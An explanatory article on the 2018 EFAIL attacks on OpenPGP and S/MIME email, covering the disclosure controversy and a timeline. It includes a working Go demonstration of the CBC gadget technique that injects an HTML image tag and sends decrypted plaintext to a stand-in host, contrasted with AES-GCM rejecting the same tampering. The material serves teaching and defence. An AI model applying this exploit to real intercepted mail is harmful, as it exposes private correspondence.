Researchers disclosed EFAIL on May 14, 2018: a set of attacks that can make some email clients leak the plaintext of previously intercepted OpenPGP- and S/MIME-encrypted messages. The attacks relied on clients automatically rendering HTML and fetching the remote content it references and, in the second class of attacks, on the malleability of the CBC and CFB encryption modes, which a client can only catch if it enforces OpenPGP's Modification Detection Code (MDC); S/MIME's content encryption has no integrity check at all. A crafted email that wraps or rewrites the intercepted ciphertext causes the decrypted content to be sent to an attacker-controlled server when the victim opens it. Reporting and follow-up commentary identified affected workflows in clients including Thunderbird and Apple Mail, and warned that using the encryption standards alone did not guarantee protection if the surrounding client behavior was unsafe.
The disclosure triggered immediate controversy over both severity and coordination. The EFF advised users to disable or uninstall PGP integrations in their mail clients until patches arrived; the researchers' short-term guidance was to disable HTML rendering and, as a precaution, to decrypt outside vulnerable mail clients, and researchers and developers alike stressed that encrypted mail could still be exchanged safely if decryption was handled outside the email application. Enigmail's lead developer said fixes for Enigmail had already shipped while Thunderbird patches were still being finalized, and criticized the publication process for alarming users without clear mitigation guidance; subsequent reporting also said Apple Mail offered no practical defense at the client level beyond changing how encrypted mail was viewed.
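To make the mechanism concrete, the following is an added example written for this page; it is not code from the researchers, from Enigmail, Thunderbird or any other mail client. Using only the Go standard library it reproduces the CBC gadget half of EFAIL: an unauthenticated AES-CBC ciphertext is rewritten, with the help of a single known plaintext block, so that it decrypts to attacker-chosen HTML followed by the victim's real plaintext, and a client that hands that output to an HTML engine which auto-loads images ends up requesting a URL that carries the plaintext to the attacker. The sample message, the demo key, the dummy `ignore` attribute and the one-letter host `x` are constructed for the demonstration (a one-letter host is used only so that scheme and host fit in one 16-byte block). The AES-GCM function at the end shows what an enforced integrity check, the role OpenPGP's MDC was meant to play, does to the same tampering.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"regexp"
)

const bs = aes.BlockSize // 16-byte AES blocks

func pad(b []byte) []byte {
	n := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n < 1 || n > bs || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("bad padding")
	}
	return b[:len(b)-n], nil
}

// encryptCBC returns iv||ciphertext with no integrity protection, as in S/MIME's CBC mode.
func encryptCBC(block cipher.Block, plaintext []byte) []byte {
	iv := make([]byte, bs)
	rand.Read(iv) // crypto/rand.Read never returns an error in current Go
	out := pad(plaintext)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, out)
	return append(iv, out...)
}

func decryptCBC(block cipher.Block, data []byte) ([]byte, error) {
	if len(data) < 2*bs || len(data)%bs != 0 {
		return nil, fmt.Errorf("bad ciphertext length")
	}
	out := make([]byte, len(data)-bs)
	cipher.NewCBCDecrypter(block, data[:bs]).CryptBlocks(out, data[bs:])
	return unpad(out)
}

// injectGadgets is the CBC gadget. CBC decrypts P_i = D(C_i) XOR C_{i-1}, so an attacker
// who knows P_0 can precede C_0 with IV' = IV XOR P_0 XOR X and C_0 then decrypts to the
// chosen block X. Each gadget also yields one uncontrolled "garbage" block; the untouched
// original is appended so the real plaintext (with its valid padding) follows the HTML.
func injectGadgets(original, knownP0 []byte, chosen ...[]byte) []byte {
	iv, c0 := original[:bs], original[bs:2*bs]
	var tampered []byte
	for _, x := range chosen {
		for i := 0; i < bs; i++ {
			tampered = append(tampered, iv[i]^knownP0[i]^x[i])
		}
		tampered = append(tampered, c0...)
	}
	return append(tampered, original...)
}

// runExfil runs the attack on a constructed message and returns what the victim's client
// decrypts plus the URL an HTML engine that auto-loads remote images would then fetch.
func runExfil(block cipher.Block, secret string) ([]byte, string, error) {
	msg := "Content-type: text/plain\r\n\r\n" + secret // constructed sample
	p0 := []byte(msg[:bs])            // known plaintext: MIME bodies start predictably
	x1 := []byte(`<img ignore="   `)  // dummy attribute absorbs the first garbage block
	x2 := []byte(`" src="http://x/`) // hypothetical one-letter host so the URL fits one block
	pt, err := decryptCBC(block, injectGadgets(encryptCBC(block, []byte(msg)), p0, x1, x2))
	if err != nil {
		return nil, "", err
	}
	url := "" // naive client: decrypted bytes go straight to the HTML engine
	if m := regexp.MustCompile(`src="([^"]*)`).FindSubmatch(pt); m != nil {
		url = string(m[1])
	}
	return pt, url, nil
}

// gcmRoundTrip is the contrast: under authenticated encryption (the job OpenPGP's MDC was
// meant to do) one flipped ciphertext bit makes Open fail, so there is nothing to render.
func gcmRoundTrip(block cipher.Block, plaintext []byte, tamper bool) ([]byte, error) {
	gcm, _ := cipher.NewGCM(block) // only fails for non-128-bit block ciphers
	nonce := make([]byte, gcm.NonceSize())
	rand.Read(nonce)
	ct := gcm.Seal(nil, nonce, plaintext, nil)
	if tamper {
		ct[0] ^= 1
	}
	return gcm.Open(nil, nonce, ct, nil)
}

func main() {
	block, _ := aes.NewCipher([]byte("0123456789abcdef")) // constructed demo key
	pt, url, err := runExfil(block, "the password is hunter2")
	fmt.Printf("client renders: %q\nattacker's server is asked for: %q (%v)\n", pt, url, err)
	_, err = gcmRoundTrip(block, []byte("same secret"), true)
	fmt.Println("AES-GCM with one flipped bit:", err)
}
```

The two garbage blocks are outside the attacker's control; the first lands inside the dummy attribute and the second inside the URL, where it is merely percent-encoded on the wire. If a garbage block happens to contain a double quote the attribute ends early and the request carries less, which is why a real attacker retries with a different layout. Nothing in the example depends on the email client: the same decrypted bytes are harmless if the client never loads remote content, and the tampered ciphertext never decrypts at all once integrity is enforced.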

Timeline of the disclosure, most recent first:
The Efail work was later formally presented as 'Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels' at USENIX Security, documenting the attack techniques against encrypted email ecosystems.
On May 25, 2018, reporting highlighted that Apple Mail messages could not be effectively protected against EFAIL within the client, underscoring ongoing exposure for users of Apple's mail software.
Enigmail-specific vulnerabilities were remediated relatively quickly in Enigmail 1.9.9 and 2.0, according to the project's lead developer. Thunderbird-side fixes took longer because of limited development capacity and major code changes.
By May 16 and 17, security experts and media had criticized the handling of the Efail announcement, questioning whether the disclosure overstated the flaws and created unnecessary panic relative to the practical mitigations available.
In a May 15 interview, Enigmail's lead developer said vendors were not told the publication date in advance and that users were alarmed without practical mitigation guidance. He also argued that disabling plugins alone was insufficient because Thunderbird's built-in S/MIME support remained exposed.
On the day of public disclosure, Thunderbird said a patch for the last known exploit vector had been submitted for review and testing, with an update expected before the end of that week.
At disclosure, the researchers recommended temporarily disabling PGP support inside email applications, while noting users could still exchange encrypted mail if encryption and decryption were performed outside the email client.
On May 14, 2018, researchers and media publicly disclosed Efail attacks against S/MIME and OpenPGP email workflows, warning that crafted emails could exfiltrate plaintext from previously obtained encrypted messages when opened in vulnerable clients.
Brunschwig said the researchers provided further information in February 2018 about weaknesses related to OpenPGP's Modification Detection Code (MDC) affecting the broader Efail attack set.
According to Enigmail lead developer Patrick Brunschwig, Sebastian Schinzel’s group first informed him in November 2017 about attacks in which Thunderbird could load a URL and leak decrypted email content through HTML handling.
Sources: usenix.org, theintercept.com, blog.cryptographyengineering.com, heise.de (two articles), arstechnica.com, eff.org